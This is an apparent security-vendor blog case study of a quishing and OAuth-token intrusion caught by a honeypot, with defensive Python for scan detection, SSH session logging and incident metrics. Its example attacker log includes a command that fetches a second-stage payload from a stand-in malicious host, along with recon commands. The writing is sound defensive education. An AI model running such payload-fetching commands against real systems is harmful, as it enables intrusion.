Security

Why a Honeypot Should Be a Key Part of Your Network

Terrence
July 22, 2025
Case Study


2025-07-22 06:14:55 — Port scan detected: 93.184.216.42 → 10.0.5.42:22 (SYN)

TL;DR

A novel attack chain began with a QR code phishing (quishing) campaign that tricked a user into scanning a malicious code with their personal phone (BYOD). The QR led to an OAuth token abuse via a spoofed Microsoft 365 consent screen — no malware, no credentials stolen. With access gained, the attacker conducted a port scan inside the corporate network, detected by a honeypot. This was followed by an SSH brute-force attack, eventually leading to interactive shell access on the honeypot. Each step was detected in real time via Slack/Teams integration. The entire incident—from network access to shell commands—was visible, logged, and timestamped for forensics. This demonstrates the power of honeypots as low-cost, high-impact detection tools against stealthy, perimeter-bypassing attacks.

1 | Entry Point: QR Phishing & Token Abuse

A new type of attack leaves traditional defenses nearly blind: a phishing email with a QR code — also known as “quishing.” Imagine an employee receives a very convincing parking fine via email, complete with a QR code to “pay immediately.” No clickable link — just a QR code. Many security filters won’t flag that.

The unfortunate user scans the code with a personal phone (BYOD). What they don’t realize is that the QR link opens a cleverly disguised OAuth login page in the phone’s browser. Using HTML smuggling techniques, malicious code is hidden inside the page — it looks just like a normal Microsoft 365 OAuth consent screen, complete with logos. Because this happens on a private device, the company proxy or firewall sees nothing. The user unsuspectingly clicks “Accept” on the OAuth screen. Bingo: the attacker now holds a valid access token for the account — no stolen credentials or malware required.

🔍 Call-out: Your firewall can’t see what the phone camera sees. Whatever the user scans with their phone rarely hits your network. In other words: BYOD + QR code = blind spot for traditional network security. No Next-Gen appliance will detect it, because nothing suspicious crosses your infrastructure.

In this scenario, the attacker now has access to internal resources. For example: the OAuth token could give access to SharePoint or an email account containing VPN credentials or internal links. The exact impact may vary, but the point stands: without your IDS/IPS or EDR noticing anything, the attacker has gained a foothold in your corporate network.

2 | First Alarm: Port Scan on the Network

Once inside, the attacker wastes no time. Seconds after the compromise, a quick scan is executed: an nmap -sS port scan of the internal subnet. This is often the first step of lateral movement — checking what systems exist and what services are open.

Our honeypot on IP 10.0.5.42 responds to this scan. It simulates active services on ports 22 (SSH) and 3306 (MySQL), returning a SYN-ACK to each SYN it receives from the attacker. The built-in port scan detector recognizes the pattern and generates an alert as soon as multiple ports are probed. An automatic notification is triggered via Slack or Teams.

Your SOC (or IT team) sees a late-night message pop up: “Honeypot port scan from 93.184.216.42.” Maybe someone is startled awake by the phone. But more importantly: you now have visibility. Someone (or something) is scanning the internal network — and that should never happen. This is the first alarm.

This early detection is critical. Traditional monitoring often misses or delays noticing internal scans (they don’t always produce clear log events). But with a honeypot, every scan packet is 100% suspicious. We now have a clear IOC and can respond immediately — before any real damage is done.
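The detection logic this section describes, as an added example that is not the honeypot vendor's code: a sliding-window detector that counts distinct ports per source address, raises at most one alert per source per window, and builds the body for a Slack-style incoming webhook. The thresholds, the legitimate admin host 10.0.5.7 and the extra ports 80/443 in the sample are my assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
import json

# Hypothetical thresholds (my assumption, not a product default): PORT_THRESHOLD
# distinct ports from one source within WINDOW counts as a scan.
PORT_THRESHOLD, WINDOW = 3, timedelta(seconds=10)

class PortScanDetector:
    """Sliding window of SYNs per source; at most one alert per source per window."""
    def __init__(self, threshold=PORT_THRESHOLD, window=WINDOW):
        self.threshold, self.window = threshold, window
        self.syns = defaultdict(deque)   # src -> deque of (ts, dst_port)
        self.last_alert = {}             # src -> ts of last alert, to avoid alert storms

    def observe_syn(self, ts, src, dst, dst_port):
        """Feed one SYN; returns an alert dict when the threshold is crossed, else None."""
        q = self.syns[src]
        q.append((ts, dst_port))
        while q and ts - q[0][0] > self.window:   # expire SYNs outside the window
            q.popleft()
        ports = sorted({p for _, p in q})
        if len(ports) >= self.threshold and ts - self.last_alert.get(src, datetime.min) > self.window:
            self.last_alert[src] = ts
            return {"ts": ts.isoformat(sep=" "), "src": src, "dst": dst, "ports": ports}
        return None

def slack_payload(alert):
    """JSON body for an incoming webhook; Slack renders the 'text' field as the message."""
    ports = ",".join(map(str, alert["ports"]))
    text = f"Honeypot port scan from {alert['src']} -> {alert['dst']} ports {ports} at {alert['ts']}"
    return json.dumps({"text": text})

def replay(detector, syn_lines):   # constructed input lines: 'ts src dst port'
    alerts = []
    for line in syn_lines:
        ts_s, src, dst, port = line.split()
        alert = detector.observe_syn(datetime.fromisoformat(ts_s), src, dst, int(port))
        if alert:
            alerts.append(alert)
    return alerts

# Constructed sample: the case study's scan plus one legitimate SSH connection.
SAMPLE_SYNS = [
    "2025-07-22T06:14:47 93.184.216.42 10.0.5.42 22",
    "2025-07-22T06:14:48 10.0.5.7 10.0.5.42 22",        # admin host, one port: no alert
    "2025-07-22T06:14:51 93.184.216.42 10.0.5.42 3306",
    "2025-07-22T06:14:55 93.184.216.42 10.0.5.42 80",   # third distinct port: alert fires
    "2025-07-22T06:14:56 93.184.216.42 10.0.5.42 443",  # inside the window: suppressed
]
```

Replaying SAMPLE_SYNS yields exactly one alert, for 93.184.216.42 at 06:14:55; the legitimate host never trips it and the fourth port is suppressed by the per-source cooldown.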

3 | Second Alarm: Brute Force and Interaction

A port scan is usually just preparation. Shortly after, the attacker attempts to break into the interesting machine they discovered — our honeypot. A brute-force attack on SSH follows. Hundreds of passwords are fired off within minutes. The honeypot allows this and stays responsive (configured specifically to not block too early). This increases its credibility — a real server that instantly locks out all attempts would look suspicious.

After several failed attempts, we deliberately let one through. Suppose the honeypot is configured to accept admin/welcome1 as valid credentials (a classic weak password). Once the attacker logs in successfully, we present them with an interactive bash shell. Another alert: “Honeypot SSH login by admin from IP 93.184.216.42” pops up in Slack/Teams. Now it’s clear: someone has obtained system access and is executing commands.

And we literally see it happening. The high-interaction SSH honeypot logs every command with timestamps and optional output. For example:

uname -a           # to check which system they’ve compromised
cat /etc/hosts     # to see hostnames and IPs for orientation
wget http://malicious.server/payload.sh   # attempting to pull in a second-stage payload

These actions are immediately visible in the live logs. Every step is relayed in real time via webhook. A security analyst watching Slack can see each command — like looking over the attacker’s shoulder. Meanwhile, the honeypot behaves like a real server, returning plausible output to commands like uname -a to avoid raising suspicion.
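The login policy and command logging described in this section, as an added illustration that is not code from the original post or its product: the session rejects the first few guesses even when they are right, accepts only admin/welcome1 after that, logs every command with a timestamp, answers with canned output, and pulls any fetched URL out of the command line for the IR report. The MIN_FAILURES value, the canned replies and the guessed passwords other than welcome1 are constructed.

```python
from datetime import datetime, timedelta
import re

# Hypothetical policy (my assumption): reject everything until MIN_FAILURES attempts have
# failed, then accept only the decoy pair from the case study.
DECOY_USER, DECOY_PASS, MIN_FAILURES = "admin", "welcome1", 5

# Constructed canned replies so the decoy answers recon commands plausibly.
CANNED_OUTPUT = {
    "uname -a": "Linux files01 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux",
    "cat /etc/hosts": "127.0.0.1 localhost\n10.0.5.42 files01.corp.example",
}
URL_RE = re.compile(r"https?://\S+")

class SshHoneypotSession:
    """One attacker session: every attempt and command is logged with a timestamp."""
    def __init__(self, src):
        self.src = src
        self.attempts = []   # (ts, user, password, accepted)
        self.commands = []   # (ts, command, canned output)
        self.alerts = []     # lines that would be relayed to the Slack/Teams webhook
        self.iocs = set()    # URLs the attacker tried to fetch, for the IR report

    def try_login(self, ts, user, password):
        failures = sum(1 for a in self.attempts if not a[3])
        accepted = failures >= MIN_FAILURES and (user, password) == (DECOY_USER, DECOY_PASS)
        self.attempts.append((ts, user, password, accepted))
        if accepted:
            self.alerts.append(f"Honeypot SSH login by {user} from IP {self.src}")
        return accepted

    def run_command(self, ts, cmd):   # log, relay, then reply plausibly (empty if unknown)
        if not any(a[3] for a in self.attempts):
            raise PermissionError("no authenticated session")
        output = CANNED_OUTPUT.get(cmd.strip(), "")
        self.commands.append((ts, cmd, output))
        self.alerts.append(f"{ts.isoformat(sep=' ')} {self.src} $ {cmd}")
        self.iocs.update(URL_RE.findall(cmd))   # e.g. a second-stage download URL
        return output

def simulate():
    """Constructed replay of the case study: brute force, decoy login, first commands."""
    s = SshHoneypotSession("93.184.216.42")
    t0 = datetime(2025, 7, 22, 6, 16, 2)
    guesses = ["123456", "password", "admin", "welcome1", "letmein", "welcome1"]
    for i, pw in enumerate(guesses):   # 4th guess is right but comes too early: rejected
        s.try_login(t0 + timedelta(seconds=i), DECOY_USER, pw)
    for i, cmd in enumerate(["uname -a", "cat /etc/hosts", "wget http://malicious.server/payload.sh"]):
        s.run_command(datetime(2025, 7, 22, 6, 19, 50) + timedelta(seconds=10 * i), cmd)
    return s
```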

4 | Reconstruction: What Happened, and When?

Let’s outline the events in logical order:

  • A user scans a QR code from a phishing email — likely on their personal phone.
  • Soon after, the attacker runs a port scan on the internal network. The honeypot receives SYN traffic on ports 22 and 3306, and responds as if real services are running. This triggers the first alert.
  • Shortly after, the attacker attempts to log in. A weak password like “welcome1” is accepted, resulting in a second alert.
  • The first commands are logged: uname, cat /etc/hosts, and other typical recon actions. The SOC sees the activity live.
  • The incident is classified, and escalation follows. The affected network segment is isolated to prevent further spread.

→ This shows how a honeypot gives valuable visibility into an intruder's actions. From initial access to interactive shell — every step is caught. Rather than an attacker moving silently, you get immediate signals — long before damage is done.

5 | What’s the Value? Analysis & Impact

Yes, this incident means work. But thanks to the honeypot, we have excellent data for response and forensic analysis:

  • Export: All events and timestamps are stored cleanly. With one click, export a CSV timeline for post-mortem reporting: who/what/when, precisely.
  • Measurable Metrics: With the entire chain logged, you can calculate:
    • Time between attack and detection: How much faster is that compared to your traditional tooling?
    • Time between detection and response: How quickly did your team act after the first alert?
    • Number of login attempts & credentials used: For example, the honeypot logs 534 password attempts, and which one succeeded. This shows attacker persistence and whether common passwords were used.
  • Cost Efficiency: All of this was detected by a single VM running smart software. Unlike expensive NDR appliances that inspect traffic flows, this lone honeypot delivered faster and more precise visibility into a real attack. Dwell time dropped from 10+ days to sometimes even seconds — at a fraction of the cost.

Of course, a honeypot doesn’t replace your other defenses. But the price/performance ratio is exceptionally strong.
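The three metrics listed above, computed from a honeypot timeline export as an added example (the CSV layout is my assumption, not the product's export format): the rows are constructed to match the case study, including the 8-second gap between the first SYN and the first alert, and the function copes with an export that has no response event yet.

```python
from datetime import datetime
import csv, io

# Constructed honeypot CSV export for the case study (not real data).
TIMELINE_CSV = """ts,event,src,detail
2025-07-22 06:14:47,syn,93.184.216.42,port=22
2025-07-22 06:14:51,syn,93.184.216.42,port=3306
2025-07-22 06:14:55,alert,93.184.216.42,port scan detected
2025-07-22 06:16:02,login_fail,93.184.216.42,admin/123456
2025-07-22 06:16:03,login_fail,93.184.216.42,admin/password
2025-07-22 06:16:05,login_fail,93.184.216.42,root/toor
2025-07-22 06:19:40,login_ok,93.184.216.42,admin/welcome1
2025-07-22 06:19:41,alert,93.184.216.42,ssh login by admin
2025-07-22 06:19:50,command,93.184.216.42,uname -a
2025-07-22 06:31:10,response,,segment isolated
"""
ATTACK_EVENTS = {"syn", "login_fail", "login_ok", "command"}

def parse_timeline(text):
    """Rows as dicts, with the timestamp column parsed into datetime."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["ts"] = datetime.strptime(r["ts"], "%Y-%m-%d %H:%M:%S")
    return rows

def incident_metrics(rows):
    """Detection and response timing plus the credential picture, from one export."""
    first_attack = min(r["ts"] for r in rows if r["event"] in ATTACK_EVENTS)
    first_alert = min(r["ts"] for r in rows if r["event"] == "alert")
    # The team may not have responded yet when the report is pulled: allow None.
    first_response = min((r["ts"] for r in rows if r["event"] == "response"), default=None)
    logins = [r for r in rows if r["event"] in ("login_fail", "login_ok")]
    success = next((r["detail"] for r in logins if r["event"] == "login_ok"), None)
    return {
        "time_to_detect_s": (first_alert - first_attack).total_seconds(),
        "time_to_respond_s": (first_response - first_alert).total_seconds() if first_response else None,
        "dwell_time_s": (first_response - first_attack).total_seconds() if first_response else None,
        "login_attempts": len(logins),
        "credentials_tried": [r["detail"] for r in logins],
        "successful_credential": success,
    }
```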

6 | Key Takeaways

Let’s summarize the most important lessons:

  • Firewalls can’t protect against QR codes and BYOD scans. Attacks can happen outside traditional perimeters, and you won’t see them.
  • EDR doesn’t catch token abuse. Agentless attacks using cloud tokens or session cookies go unnoticed. Once inside the cloud or on unmanaged devices, your endpoint visibility is gone.
  • Port scan detection is surprisingly powerful and cheap. Even basic recon reveals an attacker’s presence — if you have a honeypot listening. No fancy AI required — a SYN in the right place is enough to raise the alarm.
  • Honeypots integrate easily with Slack or Teams — no SIEM required. Real-time visibility without massive integration projects. A webhook takes minutes to set up.
  • High-interaction honeypots provide actionable logs for IR reports. You capture the attacker’s actual commands and tactics. This intel is gold for your Incident Response team and for hardening your defenses.

Bottom line: a honeypot isn’t a magic shield — it’s a smart trap. In this era of creative attacks (from QR phishing to token theft), having an extra pair of eyes inside your network isn’t a luxury — it’s a low-cost safety net. As we’ve seen, an eight-second lead can make all the difference. ⏱️
